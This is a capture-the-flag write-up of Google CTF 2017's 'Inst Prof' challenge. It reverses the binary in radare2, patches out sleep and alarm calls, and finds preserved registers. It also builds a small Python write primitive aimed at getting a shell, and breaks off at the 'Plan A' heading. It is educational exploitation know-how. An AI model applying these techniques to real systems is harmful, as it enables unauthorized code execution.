GoogleCTF 2017: Inst Prof 152 (final value)

This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.

Despite the extreme low-leveledness of the challenge work, I had tons of fun solving this challenge, and learned quite a bit more about linux, memory, and myself in the process.

If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.

I've split this writeup into two parts, Reversing and Pwning.

  • Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with radare2 or with assembly/reversing in general.

  • Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.

Reversing the Binary

After firing up the scoreboard on Friday, I saw the lowest point pwn challenge was Inst Prof, so I puzzled briefly over the flavor text and downloaded the binary:

Please help test our new compiler micro-service

Challenge running at inst-prof.ctfcompetition.com:1337


I took a look at some of the details of the binary:

-> % checksec --file ./inst_prof
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   ./inst_prof

-> % file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, 
for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.

I went ahead and ran the program to see what it did. It seemed to sleep() for a few seconds before printing ready:

-> % ./inst_prof
initializing prof...ready
[1]    19938 segmentation fault (core dumped)  ./inst_prof.bak

The most immediate thought I had was that I need to get rid of the sleep(), otherwise playing with the binary would be pain every time I went to start it up. So that was step 1:

Brain Surgery

I opened the binary with radare2 using r2 -d inst_prof to get a better look at what was happening:

[0x7f6844843d80]> s main
[0x559b6f54c860]> pd 30
            ;-- main:
            ;-- section_end..plt:
            ;-- section..text:
            ;-- main:
            0x559b6f54c860      55             push rbp     ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
            0x559b6f54c861      488d357c0300.  lea rsi, qword str.initializing_prof... ; 0x559b6f54cbe4 ; "initializing prof..."
            0x559b6f54c868      ba14000000     mov edx, 0x14           ; 20
            0x559b6f54c86d      bf01000000     mov edi, 1
            0x559b6f54c872      4889e5         mov rbp, rsp
            0x559b6f54c875      e836ffffff     call sym.imp.write
            0x559b6f54c87a      4883f814       cmp rax, 0x14           ; 20
        ,=< 0x559b6f54c87e      7407           je 0x559b6f54c887
       .--> 0x559b6f54c880      31ff           xor edi, edi
       ||   0x559b6f54c882      e8a9ffffff     call sym.imp.exit
       |`-> 0x559b6f54c887      bf05000000     mov edi, 5
       |    0x559b6f54c88c      e8afffffff     call sym.imp.sleep
       |    0x559b6f54c891      bf1e000000     mov edi, 0x1e           ; 30
       |    0x559b6f54c896      e835ffffff     call sym.imp.alarm
       |    0x559b6f54c89b      488d35570300.  lea rsi, qword str.ready_n ; 0x559b6f54cbf9 ; "ready\n"
       |    0x559b6f54c8a2      ba06000000     mov edx, 6
       |    0x559b6f54c8a7      bf01000000     mov edi, 1
       |    0x559b6f54c8ac      e8fffeffff     call sym.imp.write
       |    0x559b6f54c8b1      4883f806       cmp rax, 6              ; 6
       `==< 0x559b6f54c8b5      75c9           jne 0x559b6f54c880
            0x559b6f54c8b7      660f1f840000.  nop word [rax + rax]
        .-> 0x559b6f54c8c0      31c0           xor eax, eax
        |   0x559b6f54c8c2      e8f9010000     call sym.do_test
        `=< 0x559b6f54c8c7      ebf7           jmp 0x559b6f54c8c0

s lets you seek to an address (or symbol)

pd # lets you print disassembly of # instructions (from current seek)

Above is the disassembly output of the main function. My eyes were drawn to the three highlighted lines: Calls to sleep(), alarm(), and do_test().

From past CTF experience I knew that sleep() and alarm() were both used as mild deterrents that could easily be disabled. If we look at the arg0s for both of these functions (in the edi register), we'll see that they're taking five and thirty seconds respectively.

Five seconds was the delay experienced after seeing the initializing prof... message, and indeed we can see above that both the sleep and alarm function calls occur between the writes to STDOUT.

Before moving on to inspecting the do_test function, I performed my first operation:

-> % r2 -w inst_prof
[0x000008c9]> wx 9090909090 @ 0x88c
[0x000008c9]> wx 9090909090 @ 0x896
[0x000008c9]> s main
[0x00000860]> pd 32
            ;-- main:
            ;-- section_end..plt:
            ;-- section..text:
            ;-- main:
            0x00000860      55             push rbp        ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
            0x00000861      488d357c0300.  lea rsi, qword str.initializing_prof... ; 0xbe4 ; "initializing prof..."
            0x00000868      ba14000000     mov edx, 0x14
            0x0000086d      bf01000000     mov edi, 1
            0x00000872      4889e5         mov rbp, rsp
            0x00000875      e836ffffff     call sym.imp.write
            0x0000087a      4883f814       cmp rax, 0x14
        ,=< 0x0000087e      7407           je 0x887
       .--> 0x00000880      31ff           xor edi, edi
       ||   0x00000882      e8a9ffffff     call sym.imp.exit
       |`-> 0x00000887      bf05000000     mov edi, 5
       |    0x0000088c      90             nop
       |    0x0000088d      90             nop
       |    0x0000088e      90             nop
       |    0x0000088f      90             nop
       |    0x00000890      90             nop
       |    0x00000891      bf1e000000     mov edi, 0x1e
       |    0x00000896      90             nop
       |    0x00000897      90             nop
       |    0x00000898      90             nop
       |    0x00000899      90             nop
       |    0x0000089a      90             nop
       |    0x0000089b      488d35570300.  lea rsi, qword str.ready_n  ; 0xbf9 ; "ready\n"
       |    0x000008a2      ba06000000     mov edx, 6
       |    0x000008a7      bf01000000     mov edi, 1
       |    0x000008ac      e8fffeffff     call sym.imp.write
       |    0x000008b1      4883f806       cmp rax, 6
       `==< 0x000008b5      75c9           jne 0x880
            0x000008b7      660f1f840000.  nop word [rax + rax]
        .-> 0x000008c0      31c0           xor eax, eax
        |   0x000008c2      e8f9010000     call sym.do_test
        `=< 0x000008c7      ebf7           jmp 0x8c0

Invoking radare2 with the -w switch opens the binary file in write mode, allowing radare2 to write data to the file.

The wx command is short for write hex, and allows for writing raw bytes to an offset specified by either the current seek or @ a temporary seek offset. Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather absolute addresses of a file on disk.

Then notice that the least significant 12 bits are the same in the file as in the process! This has to do with the fact that the base address that the text section of the binary is loaded into (when it becomes a process) will always have the least significant 12 bits unset (all 0's)!

We can see that the two commands issued wrote 0x90 five times for each address 0x88c and 0x896, which fully overwrote both the sleep and alarm calls with nops. So now the binary will no longer pause or get the alarm signal sent to it (which may or may not have broken something later down the road).

Under the Microscope

Now that the speed bumps were removed, it was time to take a look at the do_test function. I took note that the instruction after calling do_test is an unconditional jmp to clearing the eax register just before calling the same function; an endless loop.

Then I disassembled the function:

[0x562bd0896860]> pd @ sym.do_test
            ;-- do_test:
            0x562bd0896ac0      55             push rbp
            0x562bd0896ac1      31c0           xor eax, eax
            0x562bd0896ac3      4889e5         mov rbp, rsp
            0x562bd0896ac6      4154           push r12
            0x562bd0896ac8      53             push rbx
            0x562bd0896ac9      4883ec10       sub rsp, 0x10
            0x562bd0896acd      e81effffff     call sym.alloc_page
            0x562bd0896ad2      4889c3         mov rbx, rax
            0x562bd0896ad5      488d05240100.  lea rax, qword sym.template ; obj.template ; 0x562bd0896c00
            0x562bd0896adc      488d7b05       lea rdi, qword [rbx + 5] ; 5
            0x562bd0896ae0      488b10         mov rdx, qword [rax]
            0x562bd0896ae3      488913         mov qword [rbx], rdx
            0x562bd0896ae6      8b5008         mov edx, dword [rax + 8] ; [0x8:4]=-1 ; 8
            0x562bd0896ae9      895308         mov dword [rbx + 8], edx
            0x562bd0896aec      0fb7500c       movzx edx, word [rax + 0xc] ; [0xc:2]=0xffff ; 12
            0x562bd0896af0      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=255 ; 14
            0x562bd0896af4      6689530c       mov word [rbx + 0xc], dx
            0x562bd0896af8      88430e         mov byte [rbx + 0xe], al
            0x562bd0896afb      e8b0ffffff     call sym.read_inst
            0x562bd0896b00      4889df         mov rdi, rbx
            0x562bd0896b03      e818ffffff     call sym.make_page_executable
            0x562bd0896b08      0f31           rdtsc
            0x562bd0896b0a      48c1e220       shl rdx, 0x20
            0x562bd0896b0e      4989c4         mov r12, rax
            0x562bd0896b11      31c0           xor eax, eax
            0x562bd0896b13      4909d4         or r12, rdx
            0x562bd0896b16      ffd3           call rbx
            0x562bd0896b18      0f31           rdtsc
            0x562bd0896b1a      bf01000000     mov edi, 1
            0x562bd0896b1f      48c1e220       shl rdx, 0x20
            0x562bd0896b23      488d75e8       lea rsi, qword [rbp - 0x18]
            0x562bd0896b27      4809c2         or rdx, rax
            0x562bd0896b2a      4c29e2         sub rdx, r12
            0x562bd0896b2d      488955e8       mov qword [rbp - 0x18], rdx
            0x562bd0896b31      ba08000000     mov edx, 8
            0x562bd0896b36      e875fcffff     call sym.imp.write
            0x562bd0896b3b      4883f808       cmp rax, 8              ; 8
        ,=< 0x562bd0896b3f      7511           jne 0x562bd0896b52
        |   0x562bd0896b41      4889df         mov rdi, rbx
        |   0x562bd0896b44      e8f7feffff     call sym.free_page
        |   0x562bd0896b49      4883c410       add rsp, 0x10
        |   0x562bd0896b4d      5b             pop rbx
        |   0x562bd0896b4e      415c           pop r12
        |   0x562bd0896b50      5d             pop rbp
        |   0x562bd0896b51      c3             ret
        `-> 0x562bd0896b52      31ff           xor edi, edi
            0x562bd0896b54      e8d7fcffff     call sym.imp.exit
            0x562bd0896b59      0f1f80000000.  nop dword [rax]

We can see above in the disassembly the calls that do_test makes, which I've highlighted. Of particular interest is the call rbx instruction which comes after the make_page_executable function. Without digging deeper, my assumption for why the program crashed was that it was expecting me to input x86 instructions (in read_inst) that would get executed (after make_page_executable), which HERPDERP definitely was not.

To see if this was right, I needed to look at the three calls before the one to rbx.


First I looked at alloc_page:

[0x5635884f4ac0]> pd @ sym.alloc_page
      |||   ;-- alloc_page:
      |||   0x5635884f49f0      55             push rbp
      |||   0x5635884f49f1      4531c9         xor r9d, r9d
      |||   0x5635884f49f4      41b8ffffffff   mov r8d, 0xffffffff     ; -1
      |||   0x5635884f49fa      b922000000     mov ecx, 0x22           ; '"' ; 34
      |||   0x5635884f49ff      ba03000000     mov edx, 3
      |||   0x5635884f4a04      be00100000     mov esi, 0x1000
      |||   0x5635884f4a09      4889e5         mov rbp, rsp
      |||   0x5635884f4a0c      31ff           xor edi, edi
      |||   0x5635884f4a0e      5d             pop rbp
      ||`=< 0x5635884f4a0f      e9acfdffff     jmp sym.imp.mmap
      ||    0x5635884f4a14      6666662e0f1f.  nop word cs:[rax + rax]

Which I saw made a call to mmap. Looking at the man page for mmap using man 2 mmap revealed the function signature:

       void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);

as well as some additional information about the parameters, especially the prot parameter, which is supplied as a bitwise OR of the following:

-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT'
#define PROT_READ   0x1     /* Page can be read.  */
#define PROT_WRITE  0x2     /* Page can be written.  */
#define PROT_EXEC   0x4     /* Page can be executed.  */
#define PROT_NONE   0x0     /* Page can not be accessed.  */
#define PROT_GROWSDOWN  0x01000000  /* Extend change to start of
#define PROT_GROWSUP    0x02000000  /* Extend change to start of

Since we know that the arguments on x86-64 are supplied in the registers rdi, rsi, rdx, rcx, r8, r9, we can see the call to mmap is made as:

mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)

This creates a new mapped region of memory that is 0x1000 bytes large, at a starting offset chosen by the kernel, that is readable and writable. The start address of the mmaped region is returned in the rax register.

Looking back at the above disassembly of do_test, I saw after the alloc_page that something was ocurring before the read_inst call involving something that radare labeled as obj.template.

Before trying to understand the code, I took a look at the obj.template:

[0x5635884f4ac0]> pxq 0x10 @ obj.template
0x5635884f4c00  0x90909000001000b9  0x00c3f77501e98390   ............u...
[0x5635884f4ac0]> pd 8 @ obj.template
            ;-- template:
            0x5635884f4c00      b900100000     mov ecx, 0x1000
        .-> 0x5635884f4c05      90             nop
        |   0x5635884f4c06      90             nop
        |   0x5635884f4c07      90             nop
        |   0x5635884f4c08      90             nop
        |   0x5635884f4c09      83e901         sub ecx, 1
        `=< 0x5635884f4c0c      75f7           jne 0x5635884f4c05
            0x5635884f4c0e      c3             ret

The pxq # command prints # hex quadwords (in little endian) at the offset specified (obj.template in this case).

Hmm, it looks as if the obj.template is potentially a loop function of some sort. It appears to execute nop four times in a loop which repeats 0x1000 times.

Taking a long look at the assembly which references this obj.template gave me an understanding of what it did with it:

 0x5635884f4acd      e81effffff     call sym.alloc_page
 0x5635884f4ad2      4889c3         mov rbx, rax                ;save addr of new page (from rax)
 0x5635884f4ad5      488d05240100.  lea rax, qword obj.template ;load obj.template addr
 0x5635884f4adc      488d7b05       lea rdi, qword [rbx + 5]    ;seek 5 into new page
 0x5635884f4ae0      488b10         mov rdx, qword [rax]        ;copy first 8 bytes of obj.template
 0x5635884f4ae3      488913         mov qword [rbx], rdx        ;paste them into new page
 0x5635884f4ae6      8b5008         mov edx, dword [rax + 8]    ;copy template bytes 0x8 to 0xb
 0x5635884f4ae9      895308         mov dword [rbx + 8], edx    ;paste into bytes 0x8 to 0xb
 0x5635884f4aec      0fb7500c       movzx edx, word [rax + 0xc] ;copy template bytes 0xc and 0xd
 0x5635884f4af0      0fb6400e       movzx eax, byte [rax + 0xe] ;copy last template byte
 0x5635884f4af4      6689530c       mov word [rbx + 0xc], dx    ;paste template bytes 0xc and 0xd
 0x5635884f4af8      88430e         mov byte [rbx + 0xe], al    ;paste last template byte (0xe)
 0x5635884f4afb      e8b0ffffff     call sym.read_inst

If that was still unclear, essentially the template bytes are copied into the start of the newly allocated page we got from alloc_page.

Up to this point I'd only been taking a look at the code statically, however I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page and read_inst calls:

[0x5635884f4ac0]> db 0x5635884f4acd
[0x5635884f4ac0]> db 0x5635884f4afb
[0x5635884f4ac0]> dc
Selecting and continuing: 2864
initializing prof...ready
hit breakpoint at: 5635884f4acd
[0x5635884f4acd]> dr rax
[0x5635884f4acd]> dso
hit breakpoint at: 5635884f4ad2
[0x5635884f4acd]> dr rax
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x0000000000000000  0x0000000000000000   ................
[0x5635884f4acd]> dc
Selecting and continuing: 2864
hit breakpoint at: 5635884f4afb
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x90909000001000b9  0x00c3f77501e98390   ............u...

db is the debug breakpoint command; dc is the debug continue command

dr is the debug register command; dso is the debug step over command

From the above output I verified that the obj.template data was copied into the region mapped by alloc_page, and using the dm (debug memory [map]) command showed me that a new page had been mapped for the process (highlighted):

[0x5635884f4acd]> dm
sys   4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._r_x
sys   4K 0x00005635886f5000 - 0x00005635886f6000 s -r--  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._rw_
sys   4K 0x00005635886f6000 - 0x00005635886f7000 s -rw-  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; obj._GLOBAL_OFFSET_TABLE_
sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys   8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0
sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._r_x
sys   8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1
sys   4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx
sys   4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._rw_
sys   4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so
sys   4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map.unk0._rw_
sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [stack] [stack] ; map._stack_._rw_
sys   8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys   8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys   4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [vsyscall] [vsyscall] ; map._vsyscall_._r_x

So far, so good. Now I just had to look at and understand the remaining two functions in do_test: read_inst and make_page_executable.

Instruct Radare

[0x562e80db3ab0]> pd 6 @ sym.read_inst 
/ (fcn) sym.read_inst 63
|   sym.read_inst ();
|       |      ; CALL XREF from 0x562e80db3afb (sym.do_test)
|       |   0x562e80db3ab0      55             push rbp
|       |   0x562e80db3ab1      be04000000     mov esi, 4
|       |   0x562e80db3ab6      4889e5         mov rbp, rsp
|       |   0x562e80db3ab9      5d             pop rbp
\       `=< 0x562e80db3aba      e9c1ffffff     jmp sym.read_n
            0x562e80db3abf      90             nop
[0x562e80db3ab0]> pd @ sym.read_n
        .-> ;-- read_n:
|              ; JMP XREF from 0x562e80db3aba (sym.read_inst)
|       .-> 0x562e80db3a80      55             push rbp
|       |   0x562e80db3a81      4885f6         test rsi, rsi
|       |   0x562e80db3a84      4889e5         mov rbp, rsp
|       |   0x562e80db3a87      4154           push r12
|       |   0x562e80db3a89      4c8d2437       lea r12, qword [rdi + rsi]
|       |   0x562e80db3a8d      53             push rbx
|       |   0x562e80db3a8e      4889fb         mov rbx, rdi
|      ,==< 0x562e80db3a91      7418           je 0x562e80db3aab
|      ||   0x562e80db3a93      0f1f440000     nop dword [rax + rax]
|     .---> 0x562e80db3a98      31c0           xor eax, eax
|     |||   0x562e80db3a9a      4883c301       add rbx, 1
|     |||   0x562e80db3a9e      e8adffffff     call sym.read_byte      ; ssize_t read(int fildes, void *buf, size_t nbyte)
|     |||   0x562e80db3aa3      8843ff         mov byte [rbx - 1], al
|     |||   0x562e80db3aa6      4c39e3         cmp rbx, r12
|     `===< 0x562e80db3aa9      75ed           jne 0x562e80db3a98
|      `--> 0x562e80db3aab      5b             pop rbx
|       |   0x562e80db3aac      415c           pop r12
|       |   0x562e80db3aae      5d             pop rbp
|       |   0x562e80db3aaf      c3             ret

We can see from the disassembly of read_inst above that the value of 4 is passed via the rsi register to read_n.

In the read_n function, rsi is immediately tested, which would set the ZF flag (if it was 0) which would shortcut the function at the je call at address 0x562e80db3a91. In our case, it's always set to 4, and so the value is then used in combination with rdi with the instruction lea r12, qword [rdi + rsi].

r12 is referenced before the jne call at 0x562e80db3aa9, and is essentially acting as a counter for how many times call sym.read_byte is called, returning when then value passed via rsi (0x4 in our case) has been reached.

Looking at the read_byte function reveals:

[0x562e80db3ab0]> pd @ sym.read_byte
/ (fcn) sym.read_byte 47
|   sym.read_byte ();
|           ; var int local_1h @ rbp-0x1
|              ; CALL XREF from 0x562e80db3a9e (sym.read_inst)
|           0x562e80db3a50      55             push rbp
|           0x562e80db3a51      31ff           xor edi, edi
|           0x562e80db3a53      ba01000000     mov edx, 1
|           0x562e80db3a58      4889e5         mov rbp, rsp
|           0x562e80db3a5b      4883ec10       sub rsp, 0x10
|           0x562e80db3a5f      488d75ff       lea rsi, qword [local_1h]
|           0x562e80db3a63      c645ff00       mov byte [local_1h], 0
|           0x562e80db3a67      e874fdffff     call sym.imp.read       ; ssize_t read(int fildes, void *buf, size_t nbyte)
|           0x562e80db3a6c      4883f801       cmp rax, 1              ; 1
|       ,=< 0x562e80db3a70      7506           jne 0x562e80db3a78
|       |   0x562e80db3a72      0fb645ff       movzx eax, byte [local_1h]
|       |   0x562e80db3a76      c9             leave
|       |   0x562e80db3a77      c3             ret
|       `-> 0x562e80db3a78      31ff           xor edi, edi
\           0x562e80db3a7a      e8b1fdffff     call sym.imp.exit       ; void exit(int status)
            0x562e80db3a7f      90             nop

Here we finally see the call to sym.imp.read which is the libc function call which reads from STDIN a number of bytes.

I set a breakpoint on the line highlighted above to see what its parameters were:

[0x562e80db3ab0]> db 0x562e80db3a67
[0x562e80db3a67]> pd 1
|           ;-- rip:
|           0x562e80db3a67 b    e874fdffff     call sym.imp.read       ; ssize_t read(int fildes, void *buf, size_t nbyte)
[0x562e80db3a67]> dr rdi; dr rsi; dr rdx

We can see that it's reading from fd 0 (file descriptor 0) which is STDIN. It's reading into memory address 0x7ffd632550af, and reading only a single byte.

After reading a single character from STDIN, it returns the character in eax, which read_n writes to [rbx - 1]

I let the process run 4 times, sending 0xc3 each time, and stepped back until I was at do_test, where I found that the 4 bytes are read into the copied obj.template, which is currently stored at the address in rbx:

[0x55cc2a53eaf8]> pd 8 @ rbx
            ;-- map.unk2._rw_:
            ;-- rbx:
            0x7feffd3ea000      b900100000     mov ecx, 0x1000
        ,=> 0x7feffd3ea005      c3             ret
        |   0x7feffd3ea006      c3             ret
        |   0x7feffd3ea007      c3             ret
        |   0x7feffd3ea008      c3             ret
        |   0x7feffd3ea009      83e901         sub ecx, 1
        `-< 0x7feffd3ea00c      75f7           jne 0x7feffd3ea005
            0x7feffd3ea00e      c3             ret

Notice that the 4 nop instructions from the template were overwritten with the bytes I supplied (0xc3 in this case).

Feeling comfortable that I understood everything so far, I took a look at make_page_executable.

It'll Give You Wings

Looking at do_test, we see just prior to calling make_page_executable, that our copied template section stored in rbx is moved into rdi:

[0x55cc2a53eb00]> pd 2
|           ;-- rip:
|           0x55cc2a53eb00      4889df         mov rdi, rbx
|           0x55cc2a53eb03      e818ffffff     call sym.make_page_executable

Then when we look at make_page_executable:

[0x55cc2a53eb00]> pd @ sym.make_page_executable 
/ (fcn) sym.make_page_executable 20
|   sym.make_page_executable ();
|      ||      ; CALL XREF from 0x55cc2a53eb03 (sym.do_test)
|      ||   0x55cc2a53ea20      55             push rbp
|      ||   0x55cc2a53ea21      ba05000000     mov edx, 5
|      ||   0x55cc2a53ea26      be00100000     mov esi, 0x1000
|      ||   0x55cc2a53ea2b      4889e5         mov rbp, rsp
|      ||   0x55cc2a53ea2e      5d             pop rbp
\      `==< 0x55cc2a53ea2f      e9ecfdffff     jmp sym.imp.mprotect

We see that it is just a wrapper around mprotect, which has the signature:

int mprotect(void *addr, size_t len, int prot)

This wrapped call to mprotect uses the address in rdi (our copied template with 4 custom instruction bytes) as the target address. len is set via rsi being 0x1000 which is a 4k page, and prot is set via rdx being set to 0x05, which marks the region as readable and executable.

Back in do_test, we see that rbx (which also holds the address to our copied template) is directly called, which will execute our 4 bytes worth of instructions in a 0x1000 loop before returning.

Once this is done, do_test calls write using a cycle count from rdtsc in rax in combination with the value in r12. I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.

After this, the loop executable region with our custom bytes is freed, and the process is endlessly repeated with subsequent calls to do_test.


The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.

After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.

The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2 binary that comes with radare just to get an idea of what kind of instructions we'd be able to use:

-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i; do echo -n "$i = "; 
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
50 = push rax
51 = push rcx
52 = push rdx
53 = push rbx
54 = push rsp
55 = push rbp
56 = push rsi
57 = push rdi
58 = pop rax
59 = pop rcx
5a = pop rdx
5b = pop rbx
5c = pop rsp
5d = pop rbp
5e = pop rsi
5f = pop rdi
6c = insb byte [rdi], dx
6d = insd dword [rdi], dx
6e = outsb dx, byte [rsi]
6f = outsd dx, dword [rsi]
90 = nop
91 = xchg eax, ecx
92 = xchg eax, edx
93 = xchg eax, ebx
94 = xchg eax, esp
95 = xchg eax, ebp
96 = xchg eax, esi
97 = xchg eax, edi
98 = cwde
99 = cdq
9b = wait
9c = pushfq
9d = popfq
9e = sahf
9f = lahf
a4 = movsb byte [rdi], byte ptr [rsi]
a5 = movsd dword [rdi], dword ptr [rsi]
a6 = cmpsb byte [rsi], byte ptr [rdi]
a7 = cmpsd dword [rsi], dword ptr [rdi]
aa = stosb byte [rdi], al
ab = stosd dword [rdi], eax
ac = lodsb al, byte [rsi]
ad = lodsd eax, dword [rsi]
ae = scasb al, byte [rdi]
af = scasd eax, dword [rdi]
c3 = ret
c9 = leave
cb = retf
cc = int3
cf = iretd
d6 = salc
d7 = xlatb
ec = in al, dx
ed = in eax, dx
ee = out dx, al
ef = out dx, eax
f1 = int1
f4 = hlt
f5 = cmc
f8 = clc
f9 = stc
fa = cli
fb = sti
fc = cld
fd = std
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i; do echo -n "$i = "; 
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
<lots of assembly instructions redacted>

I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16777215 potential instructions to evaluate.

Meanwhile I asked my friend if he could see if any of the registers' states were saved in between the do_test loops.

It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.

Revelation Registered

The breakthrough came when he discovered that the r15 and r14 registers were preserved across iterations of the do_test loop. I think he verified using a simple sequence like this:

[0x7f2d4994a000]> pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            ;-- rip:
            0x7f2d4994a000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7f2d4994a005      90             nop
        |   0x7f2d4994a006      90             nop
        |   0x7f2d4994a007      90             nop
        |   0x7f2d4994a008      90             nop
        |   0x7f2d4994a009      83e901         sub ecx, 1
        `=< 0x7f2d4994a00c      75f7           jne 0x7f2d4994a005
            0x7f2d4994a00e      c3             ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
[0x7f2d4994a000]> dr r15=0xdeadbeef
0x00000000 ->0xdeadbeef
[0x7f2d4994a000]> dc
[0x7f2d4994a000]> pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            ;-- rip:
            0x7f2d4994a000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7f2d4994a005      90             nop
        |   0x7f2d4994a006      90             nop
        |   0x7f2d4994a007      90             nop
        |   0x7f2d4994a008      90             nop
        |   0x7f2d4994a009      83e901         sub ecx, 1
        `=< 0x7f2d4994a00c      75f7           jne 0x7f2d4994a005
            0x7f2d4994a00e      c3             ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15

dr can also directly set register values (in addition to displaying them) using the dr reg=... notation as shown in the first highlighted command above.

At the second highlighted command above (dc), we had the STDIN of the binary attached to python so we could send it arbitrary bytes when the program used read() (0x90 * 4 in this case)

We can see that when setting the register value prior to continuing execution with dc that the register value (r15 in this case) is preserved after arriving at the loop section a second time.

I also verified that r13 was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:

-> % rasm2 -ax86.ks -b64 'mov r15, rsp'
-> % rasm2 -ax86.ks -b64 'mov [r15], rsp'
-> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp'
-> % rasm2 -ax86.ks -b64 'pop r15'         
-> % rasm2 -ax86.ks -b64 'shl r15, 0x20'
-> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000'
-> % rasm2 -ax86.ks -b64 'ret'            

We realized here that there were some (what we called) absolute instructions and some relative instructions; some instructions like mov were not affected by being executed 0x1000 times in the loop, while others, like shl r15, 0x20 would not survive being run multiple times in a loop.

This was tied to the instruction length being 3 or 4 bytes. Where instructions that were 3 bytes in length could have a ret appended (one byte: c3) to escape the loop, instructions which were 4 bytes in length had to be run all 0x1000 times.

Instructions that were larger than 4 bytes (like the sub rsp, 0x1000 above) could not be run.

While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

This function would write data to the address stored in the r15 register, incrementing it to keep the cursor position current after each written byte.

At this point we were able to write data as long as the address in r15 was in a writable segment, however we needed a game plan of what to write where (as well as how to get what address into r15).

Plan A

